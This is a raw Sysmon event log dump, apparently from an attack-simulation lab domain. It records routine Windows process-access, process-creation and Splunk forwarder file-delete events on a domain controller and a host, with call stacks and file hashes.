12:24:42.885{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440668Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.884{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440667Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.884{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440666Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.883{42DC5269-028A-6088-C128-00000000BA01}63645716C:\Windows\System32\smss.exe{42DC5269-028A-6088-C228-00000000BA01}4304C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x8000000000000000440665Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.883{42DC5269-028A-6088-C228-00000000BA01}4304C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e73SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{42DC5269-028A-6088-C128-00000000BA01}6364C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e0 0000007c 10341000x8000000000000000440664Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.879{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440663Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.879{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440662Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440661Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE8E-6086-0200-00000000BA01}320948C:\Windows\System32\smss.exe{42DC5269-028A-6088-C128-00000000BA01}6364C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6cc4|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440660Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440659Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440658Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440657Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440656Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440655Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.878{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440654Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.877{42DC5269-CE8E-6086-0200-00000000BA01}320948C:\Windows\System32\smss.exe{42DC5269-028A-6088-C128-00000000BA01}6364C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\SYSTEM32\ntdll.dll+8c63e|C:\Windows\SYSTEM32\ntdll.dll+8c3e9|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x8000000000000000440653Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.875{42DC5269-028A-6088-C128-00000000BA01}6364C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000e0 0000007c C:\Windows\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e73SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{42DC5269-CE8E-6086-0200-00000000BA01}320C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 23542300x8000000000000000440652Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.602{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67D1AB550EDC5BAB0F8BD40319039B79,SHA256=49FD048E25D60944883FA63FE7F5E39C9DE0E1B2382BCDC70705526C73963500,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292050Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292049Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292048Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292047Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E6A119CA47768D892CD30956AFC4D7,SHA256=6117D1D87F8FF24857F654353284FEAFD32CBA25BDBCE20DE23B12B11979FBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292046Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292045Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292044Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.793{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292043Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292042Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.777{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292041Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 